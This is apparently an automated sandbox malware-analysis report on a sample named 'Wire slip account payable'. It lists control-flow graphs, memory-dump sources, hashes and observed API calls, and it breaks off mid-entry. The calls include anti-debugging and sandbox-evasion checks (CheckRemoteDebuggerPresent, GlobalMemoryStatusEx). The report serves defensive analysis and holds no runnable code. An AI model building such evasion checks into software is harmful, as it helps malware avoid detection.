                                                                                                                    • Opcode ID: 47831695476abc0ae01ccb8811d84bced67eac3b9e6c09a7a48c31b1d5c385da
                                                                                                                    • Instruction ID: fdc549e7f6ca1ae7d4270a57bc41a7f2b3bd11e37562872c8f6c30f4ea7b4a9d
                                                                                                                    • Opcode Fuzzy Hash: 47831695476abc0ae01ccb8811d84bced67eac3b9e6c09a7a48c31b1d5c385da
                                                                                                                    • Instruction Fuzzy Hash: 87917E34F0021A9FDF54DB68D9507AEB7F6AFC9204F108469C909EB398EB74DC468B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1343 6854b70-6854b94 1346 6854b96-6854b99 1343->1346 1347 6854b9b-6854bb5 1346->1347 1348 6854bba-6854bbd 1346->1348 1347->1348 1349 6854bc3-6854cbb 1348->1349 1350 685529c-685529e 1348->1350 1368 6854cc1-6854d0e call 6855421 1349->1368 1369 6854d3e-6854d45 1349->1369 1351 68552a5-68552a8 1350->1351 1352 68552a0 1350->1352 1351->1346 1354 68552ae-68552bb 1351->1354 1352->1351 1382 6854d14-6854d30 1368->1382 1370 6854dc9-6854dd2 1369->1370 1371 6854d4b-6854dbb 1369->1371 1370->1354 1388 6854dc6 1371->1388 1389 6854dbd 1371->1389 1385 6854d32 1382->1385 1386 6854d3b-6854d3c 1382->1386 1385->1386 1386->1369 1388->1370 1389->1388
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fcq$XPcq$\Ocq
                                                                                                                    • API String ID: 0-3575482020
                                                                                                                    • Opcode ID: 195d4601afce0dacbea43b0bbf7964be905c29396868e42da69b194485bca0e2
                                                                                                                    • Instruction ID: ef22f3d78a489c7d281871ada42eacf5b3a9bd1b34dac0a31e45b452a200f3a3
                                                                                                                    • Opcode Fuzzy Hash: 195d4601afce0dacbea43b0bbf7964be905c29396868e42da69b194485bca0e2
                                                                                                                    • Instruction Fuzzy Hash: 40617F30F002189FEB549FB8C8547AEBBF6FB88750F208429E506EB395DB758D458B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 2185 6859163-6859166 2186 685916e 2185->2186 2187 6859168-685916c 2185->2187 2188 6859176-6859195 2186->2188 2189 6859170-6859175 2186->2189 2187->2186 2190 6859197-685919a 2188->2190 2189->2188 2191 68591a0-68591b5 2190->2191 2192 6859a58-6859a5b 2190->2192 2199 68591b7-68591bd 2191->2199 2200 68591cd-68591e3 2191->2200 2193 6859a81-6859a83 2192->2193 2194 6859a5d-6859a7c 2192->2194 2196 6859a85 2193->2196 2197 6859a8a-6859a8d 2193->2197 2194->2193 2196->2197 2197->2190 2201 6859a93-6859a9d 2197->2201 2202 68591c1-68591c3 2199->2202 2203 68591bf 2199->2203 2206 68591ee-68591f0 2200->2206 2202->2200 2203->2200 2207 68591f2-68591f8 2206->2207 2208 6859208-6859279 2206->2208 2209 68591fc-68591fe 2207->2209 2210 68591fa 2207->2210 2219 68592a5-68592c1 2208->2219 2220 685927b-685929e 2208->2220 2209->2208 2210->2208 2225 68592c3-68592e6 2219->2225 2226 68592ed-6859308 2219->2226 2220->2219 2225->2226 2231 6859333-685934e 2226->2231 2232 685930a-685932c 2226->2232 2237 6859350-685936c 2231->2237 2238 6859373-6859381 2231->2238 2232->2231 2237->2238 2239 6859391-685940b 2238->2239 2240 6859383-685938c 2238->2240 2246 685940d-685942b 2239->2246 2247 6859458-685946d 2239->2247 2240->2201 2251 6859447-6859456 2246->2251 2252 685942d-685943c 2246->2252 2247->2192 2251->2246 2251->2247 2252->2251
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: d9f57417221f1b79c1d382bd2e847df827ea227ecd31638dbc820c1d2b1b1283
                                                                                                                    • Instruction ID: 65338fc8960582c5196221fe89e9370cc7d95f153296ac9e8f2f804d834a583d
                                                                                                                    • Opcode Fuzzy Hash: d9f57417221f1b79c1d382bd2e847df827ea227ecd31638dbc820c1d2b1b1283
                                                                                                                    • Instruction Fuzzy Hash: D8517334B00205AFDF54DB74D950BAFB7F6ABC8644F108469C909EB398EB74DC428B95

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 2255 6854b60-6854b62 2256 6854b64-6854b66 2255->2256 2257 6854b6a 2255->2257 2262 6854b6e 2256->2262 2263 6854b68-6854b69 2256->2263 2259 6854b72-6854b75 2257->2259 2260 6854b6c 2257->2260 2261 6854b76-6854b94 2259->2261 2260->2262 2265 6854b96-6854b99 2261->2265 2262->2261 2264 6854b70-6854b71 2262->2264 2263->2257 2264->2259 2266 6854b9b-6854bb5 2265->2266 2267 6854bba-6854bbd 2265->2267 2266->2267 2268 6854bc3-6854cbb 2267->2268 2269 685529c-685529e 2267->2269 2287 6854cc1-6854d0e call 6855421 2268->2287 2288 6854d3e-6854d45 2268->2288 2270 68552a5-68552a8 2269->2270 2271 68552a0 2269->2271 2270->2265 2273 68552ae-68552bb 2270->2273 2271->2270 2301 6854d14-6854d30 2287->2301 2289 6854dc9-6854dd2 2288->2289 2290 6854d4b-6854dbb 2288->2290 2289->2273 2307 6854dc6 2290->2307 2308 6854dbd 2290->2308 2304 6854d32 2301->2304 2305 6854d3b-6854d3c 2301->2305 2304->2305 2305->2288 2307->2289 2308->2307
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fcq$XPcq
                                                                                                                    • API String ID: 0-936005338
                                                                                                                    • Opcode ID: ff1a103480ffa54cdaf5cf8fb1dc22967fae67d3a154a3066fa75f8ef359262d
                                                                                                                    • Instruction ID: 0a650eb2b51dc033b90784e0d093d6a55cd49c87498a848a0548a646f837a9f4
                                                                                                                    • Opcode Fuzzy Hash: ff1a103480ffa54cdaf5cf8fb1dc22967fae67d3a154a3066fa75f8ef359262d
                                                                                                                    • Instruction Fuzzy Hash: 61518E30F002189FDB549FB8C854BAEBBF7EB88710F208529E505EB395DB758C458B92

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 2498 694fc28-694fc37 2500 694fc63-694fc67 2498->2500 2501 694fc39-694fc46 call 694eb7c 2498->2501 2503 694fc69-694fc73 2500->2503 2504 694fc7b-694fcbc 2500->2504 2506 694fc5c 2501->2506 2507 694fc48-694fc56 call 694feb0 2501->2507 2503->2504 2510 694fcbe-694fcc6 2504->2510 2511 694fcc9-694fcd7 2504->2511 2506->2500 2507->2506 2518 694fd98-694fe58 2507->2518 2510->2511 2512 694fcd9-694fcde 2511->2512 2513 694fcfb-694fcfd 2511->2513 2515 694fce0-694fce7 call 694eb88 2512->2515 2516 694fce9 2512->2516 2517 694fd00-694fd07 2513->2517 2520 694fceb-694fcf9 2515->2520 2516->2520 2521 694fd14-694fd1b 2517->2521 2522 694fd09-694fd11 2517->2522 2551 694fe60-694fe8b GetModuleHandleW 2518->2551 2552 694fe5a-694fe5d 2518->2552 2520->2517 2524 694fd1d-694fd25 2521->2524 2525 694fd28-694fd31 call 694839c 2521->2525 2522->2521 2524->2525 2530 694fd33-694fd3b 2525->2530 2531 694fd3e-694fd43 2525->2531 2530->2531 2532 694fd45-694fd4c 2531->2532 2533 694fd61-694fd65 2531->2533 2532->2533 2535 694fd4e-694fd5e call 694e9f8 call 694eb98 2532->2535 2556 694fd68 call 694ff70 2533->2556 2557 694fd68 call 694ff60 2533->2557 2535->2533 2538 694fd6b-694fd6e 2540 694fd70-694fd8e 2538->2540 2541 694fd91-694fd97 2538->2541 2540->2541 2553 694fe94-694fea8 2551->2553 2554 694fe8d-694fe93 2551->2554 2552->2551 2554->2553 2556->2538 2557->2538
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171986917.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6940000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: a0c04d0f61dea06a243267ccdec913755daa731bdf341c9bb1361f7d5ba714c3
                                                                                                                    • Instruction ID: 1cc3060bef08c763e5aae8311017b94296d124be04c1f5c636ccb9e4abd70450
                                                                                                                    • Opcode Fuzzy Hash: a0c04d0f61dea06a243267ccdec913755daa731bdf341c9bb1361f7d5ba714c3
                                                                                                                    • Instruction Fuzzy Hash: 69813570A00B058FD7A4EF29D544B5ABBF5FF88304F10892ED48AD7A50D775E949CB90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 2559 11befc0-11befce 2560 11befd0-11befd5 2559->2560 2561 11befd6-11befdb 2559->2561 2560->2561 2562 11befdd-11bf004 2561->2562 2563 11bf005-11bf01b 2561->2563 2589 11bf01d call 11bf0a8 2563->2589 2590 11bf01d call 11befc0 2563->2590 2566 11bf022-11bf024 2567 11bf02a-11bf06e 2566->2567 2568 11bf026-11bf029 2566->2568 2573 11bf070-11bf073 2567->2573 2574 11bf076 2567->2574 2573->2574 2575 11bf078-11bf07d 2574->2575 2576 11bf07e-11bf089 2574->2576 2575->2576 2579 11bf08b-11bf08e 2576->2579 2580 11bf08f-11bf0a6 2576->2580 2582 11bf0a8-11bf0ad 2580->2582 2583 11bf0ae-11bf11c GlobalMemoryStatusEx 2580->2583 2582->2583 2585 11bf11e-11bf124 2583->2585 2586 11bf125-11bf14d 2583->2586 2585->2586 2589->2566 2590->2566
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4158958257.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_11b0000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 399aa7ca9d840f2bea8cb5d923bb69d63dd7a803672c1594184b3af972062e7a
                                                                                                                    • Instruction ID: d5f94326de2c1705f48ef9c9d9798e326af0416cf5eed4b1cd1e29f8c6a383fc
                                                                                                                    • Opcode Fuzzy Hash: 399aa7ca9d840f2bea8cb5d923bb69d63dd7a803672c1594184b3af972062e7a
                                                                                                                    • Instruction Fuzzy Hash: 38414472D0438A9FC714CF79D8002EABFF5AF8A310F0585AAD544E7261DB349845CBE2
                                                                                                                    APIs
                                                                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011B70C7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4158958257.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_11b0000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3662101638-0
                                                                                                                    • Opcode ID: 847c42bcda355eb778751f2bdaac89e62475c3ba00b88cfbdf307ee368ef25ec
                                                                                                                    • Instruction ID: 128e2644a149c263936a7d985c1925d5241ce452901f03355bfbf9c8c3d1eb6d
                                                                                                                    • Opcode Fuzzy Hash: 847c42bcda355eb778751f2bdaac89e62475c3ba00b88cfbdf307ee368ef25ec
                                                                                                                    • Instruction Fuzzy Hash: A72116B1C00259CFCB14CF9AD584BEEBBF4EF49320F14846AE855A7290D7789944CF61
                                                                                                                    APIs
                                                                                                                    • GlobalMemoryStatusEx.KERNELBASE ref: 011BF10F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4158958257.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_11b0000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1890195054-0
                                                                                                                    • Opcode ID: f81be45c4a71fb4af954c735abe64edb7fbdbbee969a9ee722b784893547b7ba
                                                                                                                    • Instruction ID: 305ad9316518522c25eaa53f079575b6c249794f7043b6d4ba1eeab44634056e
                                                                                                                    • Opcode Fuzzy Hash: f81be45c4a71fb4af954c735abe64edb7fbdbbee969a9ee722b784893547b7ba
                                                                                                                    • Instruction Fuzzy Hash: 201120B1C0066A9BCB10DF9AC944BDEFBF4EF48320F10812AD818B7240D378A940CFA5
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0694FC44), ref: 0694FE7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171986917.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6940000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 98510e60907692942742f3f916099d2c066b23c99118dd30a006d8a3427d2918
                                                                                                                    • Instruction ID: ebc9aecf12addb2ae1e5884622ca70b7b4f0fba4842f1de46535c317d19e3a72
                                                                                                                    • Opcode Fuzzy Hash: 98510e60907692942742f3f916099d2c066b23c99118dd30a006d8a3427d2918
                                                                                                                    • Instruction Fuzzy Hash: A21132B1C007098FCB10DF9AD544AEFFBF4EB88320F10842AD919A7601C375A945CFA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: 30acde6026f72fbc7c0da482dcaef708656b2207f7d0e052c1ca8e314cf3ff53
                                                                                                                    • Instruction ID: c9172d6ce73d4d08d98e49ef3723126aba84e61446088196c75a754409893bcf
                                                                                                                    • Opcode Fuzzy Hash: 30acde6026f72fbc7c0da482dcaef708656b2207f7d0e052c1ca8e314cf3ff53
                                                                                                                    • Instruction Fuzzy Hash: 1C41BE30E04349CFDB65DFA4C45429EBBB2FF86344F114929DD15EB244EB709946CB86
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: 45ad108f1d05ad9d229c6929b8a86c8fe6343b0857698af07824016c2d07fa7c
                                                                                                                    • Instruction ID: c860232d7554ee90b68a2c72647d76a819ede548ca142a7461babc507733950c
                                                                                                                    • Opcode Fuzzy Hash: 45ad108f1d05ad9d229c6929b8a86c8fe6343b0857698af07824016c2d07fa7c
                                                                                                                    • Instruction Fuzzy Hash: 59311230B002019FCB999BB4C56466FBBE2AF89340F154478D806DB395EF36DE46C791
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: a715ee7ad9b51a409188bbd3f3eb57df9b291ff8b81e932b69a9585ee12257f1
                                                                                                                    • Instruction ID: 15052b9db8a5249ac806581f72ff5ba03721f5759d17282aab52192007c2040d
                                                                                                                    • Opcode Fuzzy Hash: a715ee7ad9b51a409188bbd3f3eb57df9b291ff8b81e932b69a9585ee12257f1
                                                                                                                    • Instruction Fuzzy Hash: E631CF34B002058FDB59ABB4D56466FBBE2AF89740F104438D806EB395DF36DE46C7A1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: |
                                                                                                                    • API String ID: 0-2343686810
                                                                                                                    • Opcode ID: 21b7c10fb00673a83d45be886bd40d6cdd97e21a2fd327a739e858349bc0636d
                                                                                                                    • Instruction ID: 13c854a6aee3e7baaf237d65e56fbc6259030f26061b9c06f6b5156bc09bb487
                                                                                                                    • Opcode Fuzzy Hash: 21b7c10fb00673a83d45be886bd40d6cdd97e21a2fd327a739e858349bc0636d
                                                                                                                    • Instruction Fuzzy Hash: 9F219330B002159FDB94DB78D808A5EBBF5AF88610F10446DEA1ADB3A5DB359901CB81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: |
                                                                                                                    • API String ID: 0-2343686810
                                                                                                                    • Opcode ID: f168f40e69b52ed3c8cda4a0f4aba2bcf4cbdc7746e8bb7c46bc7efee5c1619e
                                                                                                                    • Instruction ID: fcd7a0714b02acd1744d6f40d43cde082183dcd795fc618eabb03c2622780b54
                                                                                                                    • Opcode Fuzzy Hash: f168f40e69b52ed3c8cda4a0f4aba2bcf4cbdc7746e8bb7c46bc7efee5c1619e
                                                                                                                    • Instruction Fuzzy Hash: 1D115E74B002159FDB44EB78D804B6EBBF5AF48714F10846AEA0ADB3A4DB359D008B95
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: \Ocq
                                                                                                                    • API String ID: 0-2995510325
                                                                                                                    • Opcode ID: e812c10d6eb53f03401d5747165cd5d3740e485133c90f50f971cd5d9d2b5f5e
                                                                                                                    • Instruction ID: 8eb0eb9a3888e4bd624056f8bc48213c89f9fadd68113cbc3e0687e1464d5628
                                                                                                                    • Opcode Fuzzy Hash: e812c10d6eb53f03401d5747165cd5d3740e485133c90f50f971cd5d9d2b5f5e
                                                                                                                    • Instruction Fuzzy Hash: EBF0DA30A10219DFDB54DF94E859BAEBBF2BF88710F204119E502A7294CB741D85CF80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f2a6b60b7ea7b240c49adc2baa86931044d57ad823606659b5281c6d446ce3d3
                                                                                                                    • Instruction ID: 76ffae192803a31ce40b0188e1ba270ae28b7805a91629dac88667cb135f0973
                                                                                                                    • Opcode Fuzzy Hash: f2a6b60b7ea7b240c49adc2baa86931044d57ad823606659b5281c6d446ce3d3
                                                                                                                    • Instruction Fuzzy Hash: 7461E071F000214FDF509A7DC88466FBAD7AFC8620B66443AD90EDB364EEA5DD4287C2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24de07242e64f6346259de8e47383950f0ae3ee6abc1062a2b8f3b8c6f0b7eef
                                                                                                                    • Instruction ID: de53f93d6b7fd0ee85e172d8797655669b3d01fa31cf723b6f272a36e6702026
                                                                                                                    • Opcode Fuzzy Hash: 24de07242e64f6346259de8e47383950f0ae3ee6abc1062a2b8f3b8c6f0b7eef
                                                                                                                    • Instruction Fuzzy Hash: 83816F30B002099FDF54DFA9D55076EB7F2AF89354F218429D90ADB394EB74EC868B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9ef149250159ffce0b48b039b0de7ac4d4d31ae888d5b5673838052ccd8f6b94
                                                                                                                    • Instruction ID: 8e9550eea086b7bea41dce976e8753802bf6412afa9fd356772ae6f6e443ed01
                                                                                                                    • Opcode Fuzzy Hash: 9ef149250159ffce0b48b039b0de7ac4d4d31ae888d5b5673838052ccd8f6b94
                                                                                                                    • Instruction Fuzzy Hash: 75914B30E102198BDF60DF68C880B9DB7B1FF89314F208699D549FB255EB71AA85CF91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a9ba2964da8a3a4e49a5afecbf25979654a8aaffb147dc3511766ce7027f6b64
                                                                                                                    • Instruction ID: 96b0aed5654e2f92a1957311f6148329d869575f0e8453398a93983f1e0e5aca
                                                                                                                    • Opcode Fuzzy Hash: a9ba2964da8a3a4e49a5afecbf25979654a8aaffb147dc3511766ce7027f6b64
                                                                                                                    • Instruction Fuzzy Hash: 3F913B30E102198BDF60DF68C880B9DB7B1FF89304F208699D549FB255EB70AA85CF91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4d829a6a5d03da1964af1098d54de46892d8c377b971dee58d692456be285326
                                                                                                                    • Instruction ID: 1a8b62a975c6c8bcbd9200ea8e70a915948ec8ae6301d9fd9a0742e954a951ab
                                                                                                                    • Opcode Fuzzy Hash: 4d829a6a5d03da1964af1098d54de46892d8c377b971dee58d692456be285326
                                                                                                                    • Instruction Fuzzy Hash: 25712D30A002099FDB54EFA9D984AADBBF6FF84304F158429E419EB355DB30EE46CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a5d0b799e9749ef40b5ffc8b49514d96fae9e77657f8f4c06c4b9c30f1d2655b
                                                                                                                    • Instruction ID: e7fbf2c9f0515b7b7dfd4d534b1733614a9afc99b317e6808f662888014ae152
                                                                                                                    • Opcode Fuzzy Hash: a5d0b799e9749ef40b5ffc8b49514d96fae9e77657f8f4c06c4b9c30f1d2655b
                                                                                                                    • Instruction Fuzzy Hash: 40711C30A002099FDB54EFA9D984AADBBF6FF84304F258429E419EB355DB30ED46CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 38cca93a595bbd63557705e45b700445eae1bb06115065f33c6280a6c91a7c27
                                                                                                                    • Instruction ID: 1b1e33f33986fba476e9611eff2226096d2a6f5df1d2c95e3a9be4cf80ad70f4
                                                                                                                    • Opcode Fuzzy Hash: 38cca93a595bbd63557705e45b700445eae1bb06115065f33c6280a6c91a7c27
                                                                                                                    • Instruction Fuzzy Hash: A4512631E00109DFDF64ABB8E8546ADBBB2EB84315F11887AEB06DB250DB358D55CF81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dd714595480ff4406efcbfd29b996413710b6e58b66f707ecee1f6ac55235b44
                                                                                                                    • Instruction ID: 99ccbf24b29beec96b522eefd1a0d7faf5c93b6c03fef9339be655b395f96d9a
                                                                                                                    • Opcode Fuzzy Hash: dd714595480ff4406efcbfd29b996413710b6e58b66f707ecee1f6ac55235b44
                                                                                                                    • Instruction Fuzzy Hash: CE511A30F102049FEFA56A6CDA5073F365AD789314F11482AEB0AE7799CA6DCC458B93
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 967ad47dcef2a5af0965151e288a27064dbb492cc8ff3d1711b8f251ac43752d
                                                                                                                    • Instruction ID: 5a12056245cbd7dd39df0379baeb5af682790c456c6859cdd27a47ed20e083d6
                                                                                                                    • Opcode Fuzzy Hash: 967ad47dcef2a5af0965151e288a27064dbb492cc8ff3d1711b8f251ac43752d
                                                                                                                    • Instruction Fuzzy Hash: 6F51E930B102049FEF646A6CD95473F365ED789354F21482AEB0AE7798CA69CC858793
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 93297f06b3fb5deaec047d2f75f6bbc8ec5d2dd4cd67c3232b08c1682e22cff1
